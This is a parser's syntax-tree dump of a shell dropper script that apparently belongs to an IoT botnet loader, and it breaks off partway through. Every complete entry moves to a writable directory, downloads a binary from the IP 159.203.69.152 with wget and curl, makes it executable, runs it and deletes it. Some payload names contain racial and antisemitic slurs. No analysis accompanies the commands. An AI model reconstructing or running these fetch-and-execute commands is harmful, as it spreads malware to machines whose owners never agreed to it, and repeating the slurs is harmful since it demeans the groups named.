ListNode(lineno=2, pos=(12, 180), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://159.203.69.152/YjDIEW'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 138), parts=[
    WordNode(lineno=2, pos=(102, 106), word='curl'),
    WordNode(lineno=2, pos=(107, 109), word='-O'),
    WordNode(lineno=2, pos=(110, 138), word='http://159.203.69.152/YjDIEW'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(138, 139)),
  CommandNode(lineno=2, pos=(140, 155), parts=[
    WordNode(lineno=2, pos=(140, 145), word='chmod'),
    WordNode(lineno=2, pos=(146, 148), word='+x'),
    WordNode(lineno=2, pos=(149, 155), word='YjDIEW'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(155, 156)),
  CommandNode(lineno=2, pos=(157, 165), parts=[
    WordNode(lineno=2, pos=(157, 165), word='./YjDIEW'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(165, 166)),
  CommandNode(lineno=2, pos=(167, 180), parts=[
    WordNode(lineno=2, pos=(167, 169), word='rm'),
    WordNode(lineno=2, pos=(170, 173), word='-rf'),
    WordNode(lineno=2, pos=(174, 180), word='YjDIEW'),
  ]),
])
ListNode(lineno=3, pos=(181, 339), parts=[
  CommandNode(lineno=3, pos=(181, 188), parts=[
    WordNode(lineno=3, pos=(181, 183), word='cd'),
    WordNode(lineno=3, pos=(184, 188), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(189, 191)),
  CommandNode(lineno=3, pos=(192, 203), parts=[
    WordNode(lineno=3, pos=(192, 194), word='cd'),
    WordNode(lineno=3, pos=(195, 203), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(204, 206)),
  CommandNode(lineno=3, pos=(207, 214), parts=[
    WordNode(lineno=3, pos=(207, 209), word='cd'),
    WordNode(lineno=3, pos=(210, 214), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(215, 217)),
  CommandNode(lineno=3, pos=(218, 226), parts=[
    WordNode(lineno=3, pos=(218, 220), word='cd'),
    WordNode(lineno=3, pos=(221, 226), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(227, 229)),
  CommandNode(lineno=3, pos=(230, 234), parts=[
    WordNode(lineno=3, pos=(230, 232), word='cd'),
    WordNode(lineno=3, pos=(233, 234), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(234, 235)),
  CommandNode(lineno=3, pos=(236, 267), parts=[
    WordNode(lineno=3, pos=(236, 240), word='wget'),
    WordNode(lineno=3, pos=(241, 267), word='http://159.203.69.152/JfUE'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(267, 268)),
  CommandNode(lineno=3, pos=(269, 303), parts=[
    WordNode(lineno=3, pos=(269, 273), word='curl'),
    WordNode(lineno=3, pos=(274, 276), word='-O'),
    WordNode(lineno=3, pos=(277, 303), word='http://159.203.69.152/JfUE'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(303, 304)),
  CommandNode(lineno=3, pos=(305, 318), parts=[
    WordNode(lineno=3, pos=(305, 310), word='chmod'),
    WordNode(lineno=3, pos=(311, 313), word='+x'),
    WordNode(lineno=3, pos=(314, 318), word='JfUE'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(318, 319)),
  CommandNode(lineno=3, pos=(320, 326), parts=[
    WordNode(lineno=3, pos=(320, 326), word='./JfUE'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(326, 327)),
  CommandNode(lineno=3, pos=(328, 339), parts=[
    WordNode(lineno=3, pos=(328, 330), word='rm'),
    WordNode(lineno=3, pos=(331, 334), word='-rf'),
    WordNode(lineno=3, pos=(335, 339), word='JfUE'),
  ]),
])
ListNode(lineno=4, pos=(340, 528), parts=[
  CommandNode(lineno=4, pos=(340, 347), parts=[
    WordNode(lineno=4, pos=(340, 342), word='cd'),
    WordNode(lineno=4, pos=(343, 347), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 362), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 362), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(363, 365)),
  CommandNode(lineno=4, pos=(366, 373), parts=[
    WordNode(lineno=4, pos=(366, 368), word='cd'),
    WordNode(lineno=4, pos=(369, 373), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(374, 376)),
  CommandNode(lineno=4, pos=(377, 385), parts=[
    WordNode(lineno=4, pos=(377, 379), word='cd'),
    WordNode(lineno=4, pos=(380, 385), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(386, 388)),
  CommandNode(lineno=4, pos=(389, 393), parts=[
    WordNode(lineno=4, pos=(389, 391), word='cd'),
    WordNode(lineno=4, pos=(392, 393), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(393, 394)),
  CommandNode(lineno=4, pos=(395, 432), parts=[
    WordNode(lineno=4, pos=(395, 399), word='wget'),
    WordNode(lineno=4, pos=(400, 432), word='http://159.203.69.152/INSANEMEME'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(432, 433)),
  CommandNode(lineno=4, pos=(434, 474), parts=[
    WordNode(lineno=4, pos=(434, 438), word='curl'),
    WordNode(lineno=4, pos=(439, 441), word='-O'),
    WordNode(lineno=4, pos=(442, 474), word='http://159.203.69.152/INSANEMEME'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(474, 475)),
  CommandNode(lineno=4, pos=(476, 495), parts=[
    WordNode(lineno=4, pos=(476, 481), word='chmod'),
    WordNode(lineno=4, pos=(482, 484), word='+x'),
    WordNode(lineno=4, pos=(485, 495), word='INSANEMEME'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(495, 496)),
  CommandNode(lineno=4, pos=(497, 509), parts=[
    WordNode(lineno=4, pos=(497, 509), word='./INSANEMEME'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(509, 510)),
  CommandNode(lineno=4, pos=(511, 528), parts=[
    WordNode(lineno=4, pos=(511, 513), word='rm'),
    WordNode(lineno=4, pos=(514, 517), word='-rf'),
    WordNode(lineno=4, pos=(518, 528), word='INSANEMEME'),
  ]),
])
ListNode(lineno=5, pos=(529, 712), parts=[
  CommandNode(lineno=5, pos=(529, 536), parts=[
    WordNode(lineno=5, pos=(529, 531), word='cd'),
    WordNode(lineno=5, pos=(532, 536), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(537, 539)),
  CommandNode(lineno=5, pos=(540, 551), parts=[
    WordNode(lineno=5, pos=(540, 542), word='cd'),
    WordNode(lineno=5, pos=(543, 551), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(552, 554)),
  CommandNode(lineno=5, pos=(555, 562), parts=[
    WordNode(lineno=5, pos=(555, 557), word='cd'),
    WordNode(lineno=5, pos=(558, 562), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(563, 565)),
  CommandNode(lineno=5, pos=(566, 574), parts=[
    WordNode(lineno=5, pos=(566, 568), word='cd'),
    WordNode(lineno=5, pos=(569, 574), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(575, 577)),
  CommandNode(lineno=5, pos=(578, 582), parts=[
    WordNode(lineno=5, pos=(578, 580), word='cd'),
    WordNode(lineno=5, pos=(581, 582), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(582, 583)),
  CommandNode(lineno=5, pos=(584, 620), parts=[
    WordNode(lineno=5, pos=(584, 588), word='wget'),
    WordNode(lineno=5, pos=(589, 620), word='http://159.203.69.152/WEEDISGR8'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(620, 621)),
  CommandNode(lineno=5, pos=(622, 661), parts=[
    WordNode(lineno=5, pos=(622, 626), word='curl'),
    WordNode(lineno=5, pos=(627, 629), word='-O'),
    WordNode(lineno=5, pos=(630, 661), word='http://159.203.69.152/WEEDISGR8'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(661, 662)),
  CommandNode(lineno=5, pos=(663, 681), parts=[
    WordNode(lineno=5, pos=(663, 668), word='chmod'),
    WordNode(lineno=5, pos=(669, 671), word='+x'),
    WordNode(lineno=5, pos=(672, 681), word='WEEDISGR8'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(681, 682)),
  CommandNode(lineno=5, pos=(683, 694), parts=[
    WordNode(lineno=5, pos=(683, 694), word='./WEEDISGR8'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(694, 695)),
  CommandNode(lineno=5, pos=(696, 712), parts=[
    WordNode(lineno=5, pos=(696, 698), word='rm'),
    WordNode(lineno=5, pos=(699, 702), word='-rf'),
    WordNode(lineno=5, pos=(703, 712), word='WEEDISGR8'),
  ]),
])
ListNode(lineno=6, pos=(713, 906), parts=[
  CommandNode(lineno=6, pos=(713, 720), parts=[
    WordNode(lineno=6, pos=(713, 715), word='cd'),
    WordNode(lineno=6, pos=(716, 720), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(721, 723)),
  CommandNode(lineno=6, pos=(724, 735), parts=[
    WordNode(lineno=6, pos=(724, 726), word='cd'),
    WordNode(lineno=6, pos=(727, 735), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(736, 738)),
  CommandNode(lineno=6, pos=(739, 746), parts=[
    WordNode(lineno=6, pos=(739, 741), word='cd'),
    WordNode(lineno=6, pos=(742, 746), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(747, 749)),
  CommandNode(lineno=6, pos=(750, 758), parts=[
    WordNode(lineno=6, pos=(750, 752), word='cd'),
    WordNode(lineno=6, pos=(753, 758), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(759, 761)),
  CommandNode(lineno=6, pos=(762, 766), parts=[
    WordNode(lineno=6, pos=(762, 764), word='cd'),
    WordNode(lineno=6, pos=(765, 766), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(766, 767)),
  CommandNode(lineno=6, pos=(768, 806), parts=[
    WordNode(lineno=6, pos=(768, 772), word='wget'),
    WordNode(lineno=6, pos=(773, 806), word='http://159.203.69.152/HIGHSOCIETY'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(806, 807)),
  CommandNode(lineno=6, pos=(808, 849), parts=[
    WordNode(lineno=6, pos=(808, 812), word='curl'),
    WordNode(lineno=6, pos=(813, 815), word='-O'),
    WordNode(lineno=6, pos=(816, 849), word='http://159.203.69.152/HIGHSOCIETY'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(849, 850)),
  CommandNode(lineno=6, pos=(851, 871), parts=[
    WordNode(lineno=6, pos=(851, 856), word='chmod'),
    WordNode(lineno=6, pos=(857, 859), word='+x'),
    WordNode(lineno=6, pos=(860, 871), word='HIGHSOCIETY'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(871, 872)),
  CommandNode(lineno=6, pos=(873, 886), parts=[
    WordNode(lineno=6, pos=(873, 886), word='./HIGHSOCIETY'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(886, 887)),
  CommandNode(lineno=6, pos=(888, 906), parts=[
    WordNode(lineno=6, pos=(888, 890), word='rm'),
    WordNode(lineno=6, pos=(891, 894), word='-rf'),
    WordNode(lineno=6, pos=(895, 906), word='HIGHSOCIETY'),
  ]),
])
ListNode(lineno=7, pos=(907, 1085), parts=[
  CommandNode(lineno=7, pos=(907, 914), parts=[
    WordNode(lineno=7, pos=(907, 909), word='cd'),
    WordNode(lineno=7, pos=(910, 914), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(915, 917)),
  CommandNode(lineno=7, pos=(918, 929), parts=[
    WordNode(lineno=7, pos=(918, 920), word='cd'),
    WordNode(lineno=7, pos=(921, 929), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(930, 932)),
  CommandNode(lineno=7, pos=(933, 940), parts=[
    WordNode(lineno=7, pos=(933, 935), word='cd'),
    WordNode(lineno=7, pos=(936, 940), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(941, 943)),
  CommandNode(lineno=7, pos=(944, 952), parts=[
    WordNode(lineno=7, pos=(944, 946), word='cd'),
    WordNode(lineno=7, pos=(947, 952), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(953, 955)),
  CommandNode(lineno=7, pos=(956, 960), parts=[
    WordNode(lineno=7, pos=(956, 958), word='cd'),
    WordNode(lineno=7, pos=(959, 960), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(960, 961)),
  CommandNode(lineno=7, pos=(962, 997), parts=[
    WordNode(lineno=7, pos=(962, 966), word='wget'),
    WordNode(lineno=7, pos=(967, 997), word='http://159.203.69.152/PARAZITE'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(997, 998)),
  CommandNode(lineno=7, pos=(999, 1037), parts=[
    WordNode(lineno=7, pos=(999, 1003), word='curl'),
    WordNode(lineno=7, pos=(1004, 1006), word='-O'),
    WordNode(lineno=7, pos=(1007, 1037), word='http://159.203.69.152/PARAZITE'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1037, 1038)),
  CommandNode(lineno=7, pos=(1039, 1056), parts=[
    WordNode(lineno=7, pos=(1039, 1044), word='chmod'),
    WordNode(lineno=7, pos=(1045, 1047), word='+x'),
    WordNode(lineno=7, pos=(1048, 1056), word='PARAZITE'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1056, 1057)),
  CommandNode(lineno=7, pos=(1058, 1068), parts=[
    WordNode(lineno=7, pos=(1058, 1068), word='./PARAZITE'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1068, 1069)),
  CommandNode(lineno=7, pos=(1070, 1085), parts=[
    WordNode(lineno=7, pos=(1070, 1072), word='rm'),
    WordNode(lineno=7, pos=(1073, 1076), word='-rf'),
    WordNode(lineno=7, pos=(1077, 1085), word='PARAZITE'),
  ]),
])
ListNode(lineno=8, pos=(1086, 1264), parts=[
  CommandNode(lineno=8, pos=(1086, 1093), parts=[
    WordNode(lineno=8, pos=(1086, 1088), word='cd'),
    WordNode(lineno=8, pos=(1089, 1093), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1094, 1096)),
  CommandNode(lineno=8, pos=(1097, 1108), parts=[
    WordNode(lineno=8, pos=(1097, 1099), word='cd'),
    WordNode(lineno=8, pos=(1100, 1108), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1109, 1111)),
  CommandNode(lineno=8, pos=(1112, 1119), parts=[
    WordNode(lineno=8, pos=(1112, 1114), word='cd'),
    WordNode(lineno=8, pos=(1115, 1119), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1120, 1122)),
  CommandNode(lineno=8, pos=(1123, 1131), parts=[
    WordNode(lineno=8, pos=(1123, 1125), word='cd'),
    WordNode(lineno=8, pos=(1126, 1131), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1132, 1134)),
  CommandNode(lineno=8, pos=(1135, 1139), parts=[
    WordNode(lineno=8, pos=(1135, 1137), word='cd'),
    WordNode(lineno=8, pos=(1138, 1139), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1139, 1140)),
  CommandNode(lineno=8, pos=(1141, 1176), parts=[
    WordNode(lineno=8, pos=(1141, 1145), word='wget'),
    WordNode(lineno=8, pos=(1146, 1176), word='http://159.203.69.152/H4RMl3SS'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1176, 1177)),
  CommandNode(lineno=8, pos=(1178, 1216), parts=[
    WordNode(lineno=8, pos=(1178, 1182), word='curl'),
    WordNode(lineno=8, pos=(1183, 1185), word='-O'),
    WordNode(lineno=8, pos=(1186, 1216), word='http://159.203.69.152/H4RMl3SS'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1216, 1217)),
  CommandNode(lineno=8, pos=(1218, 1235), parts=[
    WordNode(lineno=8, pos=(1218, 1223), word='chmod'),
    WordNode(lineno=8, pos=(1224, 1226), word='+x'),
    WordNode(lineno=8, pos=(1227, 1235), word='H4RMl3SS'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1235, 1236)),
  CommandNode(lineno=8, pos=(1237, 1247), parts=[
    WordNode(lineno=8, pos=(1237, 1247), word='./H4RMl3SS'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1247, 1248)),
  CommandNode(lineno=8, pos=(1249, 1264), parts=[
    WordNode(lineno=8, pos=(1249, 1251), word='rm'),
    WordNode(lineno=8, pos=(1252, 1255), word='-rf'),
    WordNode(lineno=8, pos=(1256, 1264), word='H4RMl3SS'),
  ]),
])
ListNode(lineno=9, pos=(1265, 1458), parts=[
  CommandNode(lineno=9, pos=(1265, 1272), parts=[
    WordNode(lineno=9, pos=(1265, 1267), word='cd'),
    WordNode(lineno=9, pos=(1268, 1272), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1273, 1275)),
  CommandNode(lineno=9, pos=(1276, 1287), parts=[
    WordNode(lineno=9, pos=(1276, 1278), word='cd'),
    WordNode(lineno=9, pos=(1279, 1287), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1288, 1290)),
  CommandNode(lineno=9, pos=(1291, 1298), parts=[
    WordNode(lineno=9, pos=(1291, 1293), word='cd'),
    WordNode(lineno=9, pos=(1294, 1298), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1299, 1301)),
  CommandNode(lineno=9, pos=(1302, 1310), parts=[
    WordNode(lineno=9, pos=(1302, 1304), word='cd'),
    WordNode(lineno=9, pos=(1305, 1310), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1311, 1313)),
  CommandNode(lineno=9, pos=(1314, 1318), parts=[
    WordNode(lineno=9, pos=(1314, 1316), word='cd'),
    WordNode(lineno=9, pos=(1317, 1318), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1318, 1319)),
  CommandNode(lineno=9, pos=(1320, 1358), parts=[
    WordNode(lineno=9, pos=(1320, 1324), word='wget'),
    WordNode(lineno=9, pos=(1325, 1358), word='http://159.203.69.152/HarmlessNET'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1358, 1359)),
  CommandNode(lineno=9, pos=(1360, 1401), parts=[
    WordNode(lineno=9, pos=(1360, 1364), word='curl'),
    WordNode(lineno=9, pos=(1365, 1367), word='-O'),
    WordNode(lineno=9, pos=(1368, 1401), word='http://159.203.69.152/HarmlessNET'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1401, 1402)),
  CommandNode(lineno=9, pos=(1403, 1423), parts=[
    WordNode(lineno=9, pos=(1403, 1408), word='chmod'),
    WordNode(lineno=9, pos=(1409, 1411), word='+x'),
    WordNode(lineno=9, pos=(1412, 1423), word='HarmlessNET'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1423, 1424)),
  CommandNode(lineno=9, pos=(1425, 1438), parts=[
    WordNode(lineno=9, pos=(1425, 1438), word='./HarmlessNET'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1438, 1439)),
  CommandNode(lineno=9, pos=(1440, 1458), parts=[
    WordNode(lineno=9, pos=(1440, 1442), word='rm'),
    WordNode(lineno=9, pos=(1443, 1446), word='-rf'),
    WordNode(lineno=9, pos=(1447, 1458), word='HarmlessNET'),
  ]),
])
ListNode(lineno=10, pos=(1459, 1642), parts=[
  CommandNode(lineno=10, pos=(1459, 1466), parts=[
    WordNode(lineno=10, pos=(1459, 1461), word='cd'),
    WordNode(lineno=10, pos=(1462, 1466), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1467, 1469)),
  CommandNode(lineno=10, pos=(1470, 1481), parts=[
    WordNode(lineno=10, pos=(1470, 1472), word='cd'),
    WordNode(lineno=10, pos=(1473, 1481), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1482, 1484)),
  CommandNode(lineno=10, pos=(1485, 1492), parts=[
    WordNode(lineno=10, pos=(1485, 1487), word='cd'),
    WordNode(lineno=10, pos=(1488, 1492), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1493, 1495)),
  CommandNode(lineno=10, pos=(1496, 1504), parts=[
    WordNode(lineno=10, pos=(1496, 1498), word='cd'),
    WordNode(lineno=10, pos=(1499, 1504), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1505, 1507)),
  CommandNode(lineno=10, pos=(1508, 1512), parts=[
    WordNode(lineno=10, pos=(1508, 1510), word='cd'),
    WordNode(lineno=10, pos=(1511, 1512), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1512, 1513)),
  CommandNode(lineno=10, pos=(1514, 1550), parts=[
    WordNode(lineno=10, pos=(1514, 1518), word='wget'),
    WordNode(lineno=10, pos=(1519, 1550), word='http://159.203.69.152/capNIGGRz'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1550, 1551)),
  CommandNode(lineno=10, pos=(1552, 1591), parts=[
    WordNode(lineno=10, pos=(1552, 1556), word='curl'),
    WordNode(lineno=10, pos=(1557, 1559), word='-O'),
    WordNode(lineno=10, pos=(1560, 1591), word='http://159.203.69.152/capNIGGRz'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1591, 1592)),
  CommandNode(lineno=10, pos=(1593, 1611), parts=[
    WordNode(lineno=10, pos=(1593, 1598), word='chmod'),
    WordNode(lineno=10, pos=(1599, 1601), word='+x'),
    WordNode(lineno=10, pos=(1602, 1611), word='capNIGGRz'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1611, 1612)),
  CommandNode(lineno=10, pos=(1613, 1624), parts=[
    WordNode(lineno=10, pos=(1613, 1624), word='./capNIGGRz'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1624, 1625)),
  CommandNode(lineno=10, pos=(1626, 1642), parts=[
    WordNode(lineno=10, pos=(1626, 1628), word='rm'),
    WordNode(lineno=10, pos=(1629, 1632), word='-rf'),
    WordNode(lineno=10, pos=(1633, 1642), word='capNIGGRz'),
  ]),
])
ListNode(lineno=11, pos=(1643, 1826), parts=[
  CommandNode(lineno=11, pos=(1643, 1650), parts=[
    WordNode(lineno=11, pos=(1643, 1645), word='cd'),
    WordNode(lineno=11, pos=(1646, 1650), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1651, 1653)),
  CommandNode(lineno=11, pos=(1654, 1665), parts=[
    WordNode(lineno=11, pos=(1654, 1656), word='cd'),
    WordNode(lineno=11, pos=(1657, 1665), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1666, 1668)),
  CommandNode(lineno=11, pos=(1669, 1676), parts=[
    WordNode(lineno=11, pos=(1669, 1671), word='cd'),
    WordNode(lineno=11, pos=(1672, 1676), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1677, 1679)),
  CommandNode(lineno=11, pos=(1680, 1688), parts=[
    WordNode(lineno=11, pos=(1680, 1682), word='cd'),
    WordNode(lineno=11, pos=(1683, 1688), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1689, 1691)),
  CommandNode(lineno=11, pos=(1692, 1696), parts=[
    WordNode(lineno=11, pos=(1692, 1694), word='cd'),
    WordNode(lineno=11, pos=(1695, 1696), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1696, 1697)),
  CommandNode(lineno=11, pos=(1698, 1734), parts=[
    WordNode(lineno=11, pos=(1698, 1702), word='wget'),
    WordNode(lineno=11, pos=(1703, 1734), word='http://159.203.69.152/YallRJews'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1734, 1735)),
  CommandNode(lineno=11, pos=(1736, 1775), parts=[
    WordNode(lineno=11, pos=(1736, 1740), word='curl'),
    WordNode(lineno=11, pos=(1741, 1743), word='-O'),
    WordNode(lineno=11, pos=(1744, 1775), word='http://159.203.69.152/YallRJews'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1775, 1776)),
  CommandNode(lineno=11, pos=(1777, 1795), parts=[
    WordNode(lineno=11, pos=(1777, 1782), word='chmod'),
    WordNode(lineno=11, pos=(1783, 1785), word='+x'),
    WordNode(lineno=11, pos=(1786, 1795), word='YallRJews'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1795, 1796)),
  CommandNode(lineno=11, pos=(1797, 1808), parts=[
    WordNode(lineno=11, pos=(1797, 1808), word='./YallRJews'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1808, 1809)),
  CommandNode(lineno=11, pos=(1810, 1826), parts=[
    WordNode(lineno=11, pos=(1810, 1812), word='rm'),
    WordNode(lineno=11, pos=(1813, 1816), word='-rf'),
    WordNode(lineno=11, pos=(1817, 1826), word='YallRJews'),
  ]),
])
ListNode(lineno=12, pos=(1827, 2020), parts=[
  CommandNode(lineno=12, pos=(1827, 1834), parts=[
    WordNode(lineno=12, pos=(1827, 1829), word='cd'),
    WordNode(lineno=12, pos=(1830, 1834), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1835, 1837)),
  CommandNode(lineno=12, pos=(1838, 1849), parts=[
    WordNode(lineno=12, pos=(1838, 1840), word='cd'),
    WordNode(lineno=12, pos=(1841, 1849), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1850, 1852)),
  CommandNode(lineno=12, pos=(1853, 1860), parts=[
    WordNode(lineno=12, pos=(1853, 1855), word='cd'),
    WordNode(lineno=12, pos=(1856, 1860), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1861, 1863)),
  CommandNode(lineno=12, pos=(1864, 1872), parts=[
    WordNode(lineno=12, pos=(1864, 1866), word='cd'),
    WordNode(lineno=12, pos=(1867, 1872), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1873, 1875)),
  CommandNode(lineno=12, pos=(1876, 1880), parts=[
    WordNode(lineno=12, pos=(1876, 1878), word='cd'),
    WordNode(lineno=12, pos=(1879, 1880), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1880, 1881)),
  CommandNode(lineno=12, pos=(1882, 1920), parts=[
    WordNode(lineno=12, pos=(1882, 1886), word='wget'),
    WordNode(lineno=12, pos=(1887, 1920), word='http://159.203.69.152/iJustNutted'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1920, 1921)),
  CommandNode(lineno=12, pos=(1922, 1963), parts=[
    WordNode(lineno=12, pos=(1922, 1926), word='curl'),
    WordNode(lineno=12, pos=(1927, 1929), word='-O'),
    WordNode(lineno=12, pos=(1930, 1963), word='http://159.203.69.152/iJustNutted'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1963, 1964)),
  CommandNode(lineno=12, pos=(1965, 1985), parts=[
    WordNode(lineno=12, pos=(1965, 1970), word='chmod'),
    WordNode(lineno=12, pos=(1971, 1973), word='+x'),
    WordNode(lineno=12, pos=(1974, 1985), word='iJustNutted'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1985, 1986)),
  CommandNode(lineno=12, pos=(1987, 2000), parts=[
    WordNode(lineno=12, pos=(1987, 2000), word='./iJustNutted'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(2000, 2001)),
  CommandNode(lineno=12, pos=(2002, 2020), parts=[
    WordNode(lineno=12, pos=(2002, 2004), word='rm'),
    WordNode(lineno=12, pos=(2005, 2008), word='-rf'),
    WordNode(lineno=12, pos=(2009, 2020), word='iJustNutted'),
  ]),
])
ListNode(lineno=13, pos=(2021, 2229), parts=[
  CommandNode(lineno=13, pos=(2021, 2028), parts=[
    WordNode(lineno=13, pos=(2021, 2023), word='cd'),
    WordNode(lineno=13, pos=(2024, 2028), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2029, 2031)),
  CommandNode(lineno=13, pos=(2032, 2043), parts=[
    WordNode(lineno=13, pos=(2032, 2034), word='cd'),
    WordNode(lineno=13, pos=(2035, 2043), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2044, 2046)),
  CommandNode(lineno=13, pos=(2047, 2054), parts=[
    WordNode(lineno=13, pos=(2047, 2049), word='cd'),
    WordNode(lineno=13, pos=(2050, 2054), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2055, 2057)),
  CommandNode(lineno=13, pos=(2058, 2066), parts=[
    WordNode(lineno=13, pos=(2058, 2060), word='cd'),
    WordNode(lineno=13, pos=(2061, 2066), word='/root'),
  ]),
